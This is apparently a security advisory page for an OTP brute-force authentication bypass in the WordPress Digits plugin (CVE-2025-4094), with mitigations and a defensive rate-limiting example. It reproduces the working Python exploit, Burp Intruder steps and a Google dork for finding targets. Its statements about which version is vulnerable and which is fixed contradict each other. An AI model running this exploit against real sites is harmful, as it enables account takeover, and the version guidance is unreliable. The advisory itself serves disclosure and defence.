WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
AI Analysis
Technical Summary
The WordPress Digits Plugin version 8.4.6.1 and earlier contains a critical vulnerability that allows an attacker to bypass authentication mechanisms by brute forcing the One-Time Password (OTP) used in login or password reset flows. This vulnerability arises due to the absence of rate limiting on OTP verification attempts, enabling an attacker to systematically try all possible OTP combinations (e.g., 4-digit or 6-digit codes) until the correct one is found. The exploit targets the "Forgot Password" flow but can also be applied to the registration process. The vulnerability is classified under CWE-287 (Improper Authentication) and is associated with broken authentication issues as per OWASP Top 10 (A2). The provided proof-of-concept exploit is implemented in Python and automates the brute force attack by sending HTTP POST requests to the vulnerable WordPress endpoint with varying OTP values. The script monitors responses for a success indicator to identify the correct OTP, thereby allowing unauthorized access or password reset without valid credentials. The vulnerability has been assigned CVE-2025-4094 and carries a CVSS v3.1 score of 9.8 (critical) according to the exploit author, although no official CVSS score is provided in the source data. The exploit requires no user interaction beyond intercepting a legitimate OTP verification request and does not require prior authentication, making it highly exploitable. The attack can compromise confidentiality and integrity by allowing unauthorized account access and potential account takeover, and it impacts availability by undermining the authentication mechanism's reliability.
Potential Impact
European organizations using WordPress with the Digits plugin version 8.4.6.1 or earlier are at significant risk of unauthorized access to user accounts, including administrative accounts, wherever OTP-based authentication or password reset is enabled. This can lead to data breaches, unauthorized data modification, and potential lateral movement within affected networks. Compromised user accounts can also facilitate phishing, fraud, and further exploitation of organizational resources. Given WordPress's widespread use in Europe for websites ranging from small businesses to government portals, the impact can be broad and severe. Organizations handling sensitive user data, financial information, or critical infrastructure are particularly exposed. The lack of rate limiting means automated attacks can be conducted at scale, increasing the likelihood of successful exploitation. The attack also undermines user trust and can cause reputational damage. Because the exploit is fully automated, the skill barrier for attackers is low, which broadens the threat. Without mitigation, attackers can bypass multi-factor authentication protections, severely weakening overall security posture.
Mitigation Recommendations
1. Immediately update or patch the Digits plugin to version 8.4.6.1 or later, where the vulnerability is fixed. If an official patch is unavailable, temporarily disable the plugin or its OTP feature.
2. Implement server-side rate limiting on OTP verification endpoints to restrict the number of attempts per user or IP address within a defined time window.
3. Employ account lockout after a defined number of failed OTP attempts to stop brute-force attacks.
4. Enhance logging and monitoring to detect unusual OTP verification request patterns indicative of brute forcing.
5. Use CAPTCHA or other challenge-response tests on OTP submission forms to hinder automated attacks.
6. Consider integrating additional authentication factors beyond OTP, such as hardware tokens or biometric verification.
7. For organizations unable to patch immediately, deploy Web Application Firewall (WAF) rules that detect and block rapid sequential OTP verification attempts.
8. Educate users about the risks and encourage strong, unique passwords alongside OTP usage.
9. Regularly audit and review plugin usage and configurations against security best practices.
10. Coordinate with hosting providers to monitor and mitigate large-scale brute-force activity targeting WordPress sites.
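The following Python example is added here and is not code from the advisory, the exploit author or the Digits plugin. It contrasts a verification endpoint with no attempt budget, which a sequential 0000-9999 sweep like the PoC's always exhausts, with a verifier that applies recommendations 2 and 3: a failure budget per identifier inside a sliding window, then a lockout that also invalidates the pending code. The `OtpVerifier` class, its limits (5 tries per 10 minutes, 15-minute lockout) and the 10 ms request spacing in the simulated sweep are assumptions.

```python
import hmac
import time
from dataclasses import dataclass, field

def sweep_unthrottled(stored_code: str, digits: int = 4) -> int:
    """Missing rate limit: the sequential sweep is answered every time; returns requests needed."""
    for n in range(10 ** digits):
        if stored_code == f"{n:0{digits}d}":
            return n + 1
    return 0

@dataclass
class OtpVerifier:
    """Assumed hardened check: bounded failures per identifier in a window, then lockout."""
    max_attempts: int = 5        # failed tries allowed per window (recommendation 2)
    window_secs: float = 600.0   # sliding window in which failures are counted
    lockout_secs: float = 900.0  # lockout once the budget is spent (recommendation 3)
    _codes: dict = field(default_factory=dict)      # identifier -> (code, expiry)
    _failures: dict = field(default_factory=dict)   # identifier -> failure timestamps
    _locked_until: dict = field(default_factory=dict)

    def issue(self, ident: str, code: str, ttl: float = 300.0, now=None) -> None:
        now = time.time() if now is None else now   # store a generated code with its expiry
        self._codes[ident] = (code, now + ttl)

    def verify(self, ident: str, attempt: str, now=None) -> str:
        """Returns 'ok', 'bad', 'locked' or 'expired'."""
        now = time.time() if now is None else now
        if self._locked_until.get(ident, 0.0) > now:
            return "locked"
        recent = [t for t in self._failures.get(ident, []) if now - t < self.window_secs]
        self._failures[ident] = recent
        stored = self._codes.get(ident)
        if stored is None or stored[1] < now:
            return "expired"
        if hmac.compare_digest(stored[0], attempt):  # constant-time compare; code is single use
            self._codes.pop(ident)
            return "ok"
        recent.append(now)
        if len(recent) >= self.max_attempts:
            self._locked_until[ident] = now + self.lockout_secs
            self._codes.pop(ident, None)             # user must request a fresh code
            return "locked"
        return "bad"

def sweep_throttled(verifier: OtpVerifier, ident: str, digits: int = 4, start: float = 0.0) -> dict:
    """The same sweep (one request per 10 ms) against the hardened verifier; counts each outcome."""
    counts = {"ok": 0, "bad": 0, "locked": 0, "expired": 0}
    for n in range(10 ** digits):
        counts[verifier.verify(ident, f"{n:0{digits}d}", now=start + n * 0.01)] += 1
    return counts
```

With a constructed 4-digit code of 7310, the unthrottled endpoint yields to the sweep after 7311 requests, while the hardened verifier answers "bad" four times and "locked" for the remaining 9996 requests without ever returning "ok".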
Affected Countries
Germany, United Kingdom, France, Italy, Spain, Netherlands, Poland, Sweden, Belgium, Austria
Indicators of Compromise
- exploit-code:

# Exploit Title: WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
# Google Dork: inurl:/wp-content/plugins/digits/
# Date: 2025-04-30
# Exploit Author: Saleh Tarawneh
# Vendor Homepage: https://digits.unitedover.com/
# Version: < 8.4.6.1
# CVE : CVE-2025-4094

"""
The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks
due to missing rate limiting. An attacker can exploit this to bypass authentication or password reset
by iterating over possible OTP values. This PoC targets the "Forgot Password" flow and automates the
attack, which is the same concept that is valid for the registration flow.

CWE-287: Improper Authentication
CVSS v3.1: 9.8 (Critical)
OWASP A2: Broken Authentication

[Instructions]
1. Use a tool like Burp Suite or your browser’s developer tools to intercept the OTP verification request.
2. Copy the exact request parameters.
3. Replace the placeholder values in the script with real data from the intercepted request.
4. Run the script to brute-force 4-digit OTPs (0000 to 9999) or you can change it to 6-digit.

[Alternative Method – Burp Suite Pro]
If you have Burp Suite Pro, you can perform the OTP brute-force attack manually:
1. Intercept the OTP request using Burp Proxy.
2. Send the request to Intruder.
3. Mark the `sms_otp` parameter as the payload position.
4. Load a payload list from `000000` to `999999` (for 6-digit OTPs).
5. Start the attack and monitor responses for a different status code, length, or success message.
"""

import sys
import requests


def brute(otp):
    url = "https://example.com/wp-admin/admin-ajax.php"
    data = {  # Replace with the target's data
        "login_digt_countrycode": "+",
        "digits_phone": "000000000",
        "action_type": "phone",
        "sms_otp": otp,
        "otp_step_1": "1",
        "instance_id": "xxxxxxx",
        "action": "digits_forms_ajax",
        "type": "forgot",
        "forgot_pass_method": "sms_otp",
        "digits": "1",
        "digits_redirect_page": "//example.com/",
        "digits_form": "xxxxxxxx",
        "_wp_http_referer": "/?login=true",
    }
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": "https://example.com/?login=true",  # Replace with intercepted referer
    }
    response = requests.post(url, data=data, headers=headers)
    if '"success":true' in response.text:
        print(f"[+] OTP FOUND: {otp}")
        sys.exit(0)


def main():
    for otp in range(0, 10000):  # range(0, 1000000): for 6-digit
        otp_str = f"{otp:04d}"  # {otp:06d} for 6-digit
        print(f"[*] Trying OTP: {otp_str}")
        brute(otp_str)


if __name__ == "__main__":
    main()
Technical Details
- EDB Id: 52307
- Has Exploit Code: true
- Code Language: python
Threat ID: 68489d917e6d765d51d52a95
Added to database: 6/10/2025, 9:03:13 PM
Last enriched: 6/11/2025, 8:39:26 AM
Last updated: 8/17/2025, 8:46:41 PM